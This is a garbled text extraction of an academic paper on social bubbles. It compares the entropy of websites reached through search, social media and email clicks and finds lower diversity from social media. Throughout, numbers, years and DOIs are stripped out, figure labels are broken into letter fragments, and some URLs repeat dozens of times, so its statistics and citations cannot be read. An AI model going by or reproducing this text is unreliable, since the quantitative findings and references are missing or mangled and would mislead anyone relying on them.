http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://dx.doi.org/ . /peerj-cs. table most frequent sources for each category of traffic and their corresponding numbers of clicks. search social media email google.com ( , , ) facebook ( , ) mail.yahoo.com ( , ) search.yahoo.com ( , , ) reddit.com ( , ) mail.live.com ( , ) search.msn.com ( , ) twitter.com ( , ) mail.google.com ( , ) bing.com ( , ) myspace.com ( , ) webmail.aol.com ( , ) ask.com ( , ) youtube.com ( , ) hotmail.msn.com ( , ) search.naver.com ( , ) linkedin.com ( , ) webmail.iu.edu ( , ) target domains. we take referrer and target domains as proxies for websites. this level of granularity allows us to address the research question while avoiding the problem of the sparseness of the traffic at the page level—users typically visit most pages once. even if we identify a domain with a website, not all sites are equal—wikipedia.org has more diverse content than kinseyinstitute.org. furthermore, one needs to decide whether to represent domains at the second or higher level. in many instances, higher-level domains reflect infrastructural or organizational differences that are not important to measure diversity (e.g., m.facebook.com vs. l.facebook.com). in others cases, using second-level domains may miss important content differences (e.g., sports.yahoo.com vs. finance.yahoo.com). to address this issue, we performed our analysis using both second- and third-level domains. as discussed below, these analyses yield very similar results. in the remainder of the paper we consider second-level domains, but account for special country cases; for example, domains such as theguardian.co.uk are considered as separate websites. once we have a definition of a website, we use the number of clicks in the data to compute a diversity measure as discussed below. after extracting the domain at the end points of each click, we examined the most popular referrers in the dataset and manually assigned them to the search, social media, and email categories. we then filtered the click data to only include referrers from these categories. in addition, we excluded targets from these same categories, because we are specifically interested in the acquisition of new information. for example, activities such as refining searches on google and socializing on facebook are unlikely to represent such discovery. subsequent data filtering was performed to exclude other likely non-human traffic, such as traffic to ad and image servers, traffic resulting from game playing or using browser ap- plications such as rss readers, and traffic to url shortening services. since it is impossible to exclude all non-human traffic, we focused on filtering out those target domains that constitute a significant portion of overall traffic. we used an iterative procedure in which we examined the top targets for each category and manually identified traffic that is non-human. this procedure was repeated until the list of top domains in each category was composed of legitimate targets. table lists the top six referrers in each category. the filtered dataset includes over million records, roughly representing someone clicking on a link from a search engine, email client, or social media site, and going to one of almost . million targets outside these three categories. nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table seed dmoz categories for the crawler used to extract a list of close to , news sites. www.dmoz.org/news/internet broadcasts/ www.dmoz.org/news/magazines and e-zines/ www.dmoz.org/news/newspapers/ www.dmoz.org/news/internet broadcasts/audio/ www.dmoz.org/arts/television/news/ www.dmoz.org/news/analysis and opinion/ www.dmoz.org/news/alternative/ www.dmoz.org/news/breaking news/ www.dmoz.org/news/current events/ www.dmoz.org/news/extended coverage/ news targets in the click dataset to measure diversity of information exposure in the context of news, we created a separate dataset consisting only of clicks to news targets. due to the specific research question we are investigating, we believe it is important to build this dataset in an open and comprehensive way, including less popular news outlets. to this end, we extracted the list of news websites by traversing the dmoz open directory (http://www.dmoz.org/) starting with the seed categories shown in table and crawling their subcategories recursively. following the crawl, the list of news targets was filtered as follows. . each url was transformed to a canonical form and only the domain name was kept. . domains falling in one of the predefined categories—search, social media and email—were removed. urls from popular blogging platforms, wiki platforms, and news aggregators were also removed (see table ). . an iterative filtering procedure was applied to remove targets of non-human traffic, such as from rss clients, advertising, and content servers. the above procedure resulted in nearly , news sites. we used this list to filter the targets in the click collection, yielding the news dataset used in our analysis. diversity measure and relationship to traffic to quantify the diversity of an information source s we look at all targets reached from websites in category s and compute the shannon entropy hs = −  t∈t(s) pt logpt , where t(s) is the set of target websites reached from referrer sites in s, and pt is the fraction of clicks requesting pages in website t. entropy (shannon, ) is a measure of uncertainty over a set of possible outcomes. it is maximized when all outcomes are equally likely, and minimized when only a single outcome is likely (indicating full certainty). used over the set of domain probabilities as we have done above, the entropy gives the uncertainty in the websites that will be nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://www.dmoz.org/ http://dx.doi.org/ . /peerj-cs. table blogging platforms, wiki platforms and news aggregators filtered out of the list of news sites. blogging platforms wiki platforms news aggregators blogger.com wikipedia.org news.aol.com blogspot.com wictionary.org news.google.com hubpages.com wikibooks.org news.yahoo.com livejournal.com wikidata.org tumblr.com wikimediafoundation.org typepad.com wikinews.org wordpress.com wikiquote.org wordpress.org wikisource.org xanga.com wikiversity.org wikivoyage.org accessed given a category of referrers. by measuring diversity over a set of domains, our approach captures the intuition that visiting pages (for example, news articles) from different sites implies a more diverse exposure than visiting pages from the same site. the implications of this assumption are further debated in the ‘discussion’ section. we considered an alternative method of measuring diversity based on the gini coefficient (sen, ), and found the results discussed below to be robust with respect to the choice of diversity measure. the traffic volume in our click dataset varies significantly over time and across the three categories, as shown in fig. a. a similar pattern emerges for the dataset of news targets (see inset). these vast volume differences make it necessary to understand the relationship between traffic volume and the diversity of an information source. to do so, we measure the diversity over samples of increasing numbers of clicks. from fig. b we see that the diversity measurements indeed depend on volume, especially for small numbers of clicks; as the volume increases, the diversity tends to plateau. however, the dependence of diversity on number of clicks is different for each category of traffic. therefore, instead of normalizing each category of traffic by a separate normalization curve, we account for the dependence by using the same number of clicks. this makes our approach easier to generalize to more categories and datasets, since it does not require the fitting of a separate curve to each case. we compute the diversity over traffic samples of the same size ( , clicks per month for all targets, and , clicks per month for news targets) for each category in our analysis. auxiliary datasets in the second part of our analysis we make use of two auxiliary datasets to disentangle the relationship between collective diversity—as seen in the targets accessed by a community of users—and individual diversity—as seen in the targets accessed by a single user. from both datasets, we are able to recover a referring website, a target website, and an associated user identifier. nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. o ct d ec fe b a p r ju l s ep n ov ja n m ar m ay ju l s ep n ov a p r ju n a u g o ct d ec fe b a p r c li c k s (m il li o n s) mail social media search . . . . . . . news a clicks e n tr o p y mail social media search news b figure dependence of entropy on traffic volume. (a) traffic volume as a function of time for three different sources. (b) entropy as a function of traffic volume. error bars become negligibly small at clicks, and are omitted for clarity. with fewer than clicks, the entropy for the different categories is not significantly different. the insets show click volume and entropy for news traffic (same scale if not shown). aol search logs in the search dataset we have information about search engine sessions from a period of three months in , containing over million clicks by over half a million users of the aol search engine. twitter posts in the social media dataset we have a sample of almost . billion public posts containing links shared by over million people on twitter during a period of months between april and april . this data was obtained from the twitter streaming api (https://dev.twitter.com/streaming/overview). we treat these records as proxies for clicks, assuming that users have visited the shared pages. results figure a presents our main finding: the diversity of targets reached from social media is significantly lower than those reached from search engine traffic, for all traffic as well as news targets (inset). this result holds for both second- and third-level domains, and is consistent with results obtained using an alternative measures of diversity. the observed differences in diversity did not change significantly over a period of three and a half years (see fig. b). this empirical evidence suggests that social media expose the community to a narrower range of information sources, compared to a baseline of information seeking activities. figure illustrates the top targets of traffic from search and social media on a typical week. the diversity of targets reached via email also seems to be higher than that of social media, however the difference is smaller and its statistical significance is weaker due to the larger noise in the data. the difference in entropy is larger and more significant for traffic from email sources to news targets. while we wish to ultimately understand the biases experienced by individuals, the diversity measurements based on anonymous traffic data do not distinguish between users, and therefore they reveal a collective social bubble, as illustrated in figs. c and d. it is nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview https://dev.twitter.com/streaming/overview http://dx.doi.org/ . /peerj-cs. mail social media search . . . . . e n tr o p y news aaaaaa o ct d ec fe b a p r ju l s ep n ov ja n m ar m ay ju l s ep m ar ju n a u g o ct d ec fe b a p r mail social media search . . . . . . . . . news b figure diversity of sources accessed by different online activities. (a) overall entropy for different traffic categories over the full range of data (oct –may ). each box represents the range of data between the th and th percentiles. the top and bottom whiskers show the th and st percentiles, respectively. the horizontal line and the hollow point inside each box mark the median and mean entropy, respectively. the filled points are outliers. the uncertainty was computed over data points representing the clicks that occurred over one calendar month. (b) entropy as a function of time. we smooth the data by applying a running average over a three-month sliding window that moves in increments of one month. error bars are negligibly small and thus omitted. the insets plot the entropy for news traffic (same scale if not shown). at first sight unclear whether the collective bubble implies individual bubbles, or tells us anything at all about individual exposure. the number of clicks per user, or even the number of users could vary to produce different individual diversity patterns resulting in the same collective diversity. in theory, high collective diversity could be consistent with low individual diversity, and vice versa. therefore we must investigate the relationship between collective and individual diversity measurements. to this end, we analyze the two auxiliary datasets where user information is preserved (see ‘methods’). for both datasets, we measure the diversity for individual users, and collectively disregarding user labels. the strong correlation between collective diversity and average user diversity (fig. ) suggests that our results relate not only to a collective bubble, but also to individual social bubbles, as illustrated in figs. a and b. discussion we have presented evidence that the diversity of information reached through social media is significantly lower than through a search baseline. as the social media role in supporting information diffusion increases, there is also an increased danger of reinforcing our collective filter bubble. a similar picture emerges when we specifically look at news traffic—the diversity of social media communication is significantly lower than that of search and inter-personal communication. given the importance of news consumption to civic discourse, this finding is especially relevant to the filter bubble hypothesis. our results suggest that social bubbles exist at the individual level as well, although our evidence is based on the relationship between collective and individual diversity and therefore indirect. analysis of traffic data with (anonymized) user identifiers will be necessary to confirm this conclusively. in addition, these results apply to the population of nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure top websites that are targets of % of clicks for search (a) and social media (b). this illustration refers to a typical week, with entropy close to (within one standard deviation from) average. the area of each rectangle is proportional to the number of clicks to that target. while these websites reflect the sample of users from indiana university as well as the time when the data was collected, these contexts apply to both categories of traffic. therefore the higher concentration of social media traffic on a small number of targets is meaningful. users from indiana university during the time period when the data was collected—from late to mid . repeating these experiments on other populations would be beneficial to establish the generality of our findings. indeed, the social media and search landscapes have changed since and how that affects the diversity of information exposure for people is an interesting question for ongoing research. further research is also needed to tease out the influence of social versus algorithmic effects. both are present in systems like facebook—the algorithmic effect has to do with how a platform populates the feed for each user, which can be determined by a variety of individual and collective signals such as past social interactions and popularity. it seems nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure correlation between collective and average individual entropy. each point corresponds to an equal-size sample of links for each of a set of users sampled during a period of one day, to avoid volume bias in the entropy measurements. (a) users sampled from search engine logs and their clicks (pearson’s r = . ). we sampled clicks from each of users per day. (b) users sampled from twitter and their shared links (r = . ). we sampled links from each of , users per day. unlikely that the relationship between algorithmic and social effects can be extracted from traces of online behavior as done here, without conducting controlled user studies. these results also come with the caveat that in our analysis we do not try to quantify the diversity inside each domain. we are assuming that the diversity of content is higher across different domains than across the pages within a single domain. the problem of quantify- ing the diversity of the content inside a single domain is a significant research problem in its own right, and one that would greatly benefit this and similar lines of research. quantifying domain diversity will likely need to be tackled by looking at the content of individual pages as other measures, such as the number of sub-domains or the number of pages inside the domain, are more indicative of size and popularity, but not necessarily of diversity. finally, in our study all social media traffic and all search traffic is merged. further work is needed to tease out possible differences in diversity of information accessed through distinct search and social platforms. the social media platforms that exist today have important differences in functionality, and it will be worthwhile to investigate whether all these services under the umbrella of social media have similar properties when it comes to diverse information exposure. conclusion our findings provide the first large-scale empirical comparison between the diversity of information sources reached through different types of online activity. the traffic dataset gives us a unique opportunity to carry out this analysis. we are not aware of any other methods, based on publicly available data, for contrasting different information access patterns produced by the same set of users, in the same time period. while we have found quantitative support of online social bubbles, the question of whether our reliance on technology for information access is fostering polarization and nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. misinformation remains open. even with ample anecdotal evidence (mervis, ), we have yet to fully comprehend how today’s technology biases exposure to information. acknowledgement we are grateful to mark meiss for collecting the web traffic dataset used in this paper. additional information and declarations funding this manuscript is based upon work supported in part by the james s. mcdonnell foundation and the national science foundation (award ccf- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: james s. mcdonnell foundation. national science foundation: ccf- . competing interests filippo menczer is an academic editor for peerj computer science. the other authors declare there are no competing interests. author contributions • dimitar nikolov and diego f.m. oliveira conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • alessandro flammini and filippo menczer conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the click collection system dataset from the iu school of informatics and computing restricts the access and use of this dataset for research purposes only, and requires all interested parties to submit a formal request at http://cnets.indiana.edu/groups/nan/ webtraffic/click-dataset/. references adamic l, glance n. . the political blogosphere and the us election: divided they blog. in: linkkdd’ : proceedings of the rd international workshop on link discovery. – . an j, quercia d, cha m, gummadi k, crowcroft j. . sharing political news: the balancing act of intimacy and socialization in selective exposure. epj data science :article doi . /epjds/s - - - . nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://dx.doi.org/ . /epjds/s - - - http://dx.doi.org/ . /peerj-cs. bakshy e, messing s, adamic l. . exposure to ideologically diverse news and opinion on facebook. science. bakshy e, rosenn i, marlow c, adamic l. . the role of social networks in information diffusion. in: proceedings of the st international conference on world wide web, www’ . new york: acm, – . baron j. . thinking and deciding. rd edition. new york: cambridge university press. conover m, ratkiewicz j, francisco m, gonçalves b, flammini a, menczer f. . political polarization on twitter. in: proceedings of the th international aaai conference on weblogs and social media (icwsm). conover md, gonçalves b, flammini a, menczer f. . partisan asymmetries in online political activity. epj data science :article doi . /epjds . doris-down a, versee h, gilbert e. . political blend: an application designed to bring people together based on political differences. in: proceedings of the th international conference on communities and technologies. new york: acm, – . flaxman s, goel s, rao jm. . ideological segregation and the effects of social media on news consumption. in: ssrn scholarly paper id . new york: social science research network. fortunato s, flammini a, menczer f, vespignani a. . topical interests and the mitigation of search engine bias. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . gilbert e, bergstrom t, karahalios k. . blogs are echo chambers: blogs are echo chambers. in: proceedings of hicss. piscataway: ieee, – . google. a. introducing google social search: i finally found my friend’s new york blog! available at http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html (accessed january ). google. b. personalized search for everyone. available at http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html (accessed august ). graells-garrido e, lalmas m, quercia d. . data portraits: connecting people of opposing views. technical report. arxiv preprint. arxiv: . . grevet c, terveen lg, gilbert e. . managing political differences in social media. in: proceedings of the th acm conference on computer supported cooperative work & social computing. new york: acm, – . hart w, albarracı́n d, eagly ah, brechan i, lindberg mj, merrill l. . feeling validated versus being correct: a meta-analysis of selective exposure to information. psychological bulletin ( ): – doi . /a . hosanagar k, fleder d, lee d, buja a. . will the global village fracture into tribes? recommender systems and their effects on consumer fragmentation. management science ( ): – doi . /mnsc. . . kastenmüller a, greitemeyer t, jonas e, fischer p, frey d. . selective exposure: the impact of collectivism and individualism. british journal of social psychology ( ): – doi . / x . koutra d, bennett p, horvitz e. . events and controversies: influences of a shocking news event on information seeking. technical report. arxiv preprint. arxiv: . . matsa ke, mitchell a. . key takeaways about social media and news. available at http:// www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ (accessed september ). nikolov et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /epjds http://dx.doi.org/ . /pnas. http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /introducing-google-social-search-i.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html http://googleblog.blogspot.com/ / /personalized-search-for-everyone.html 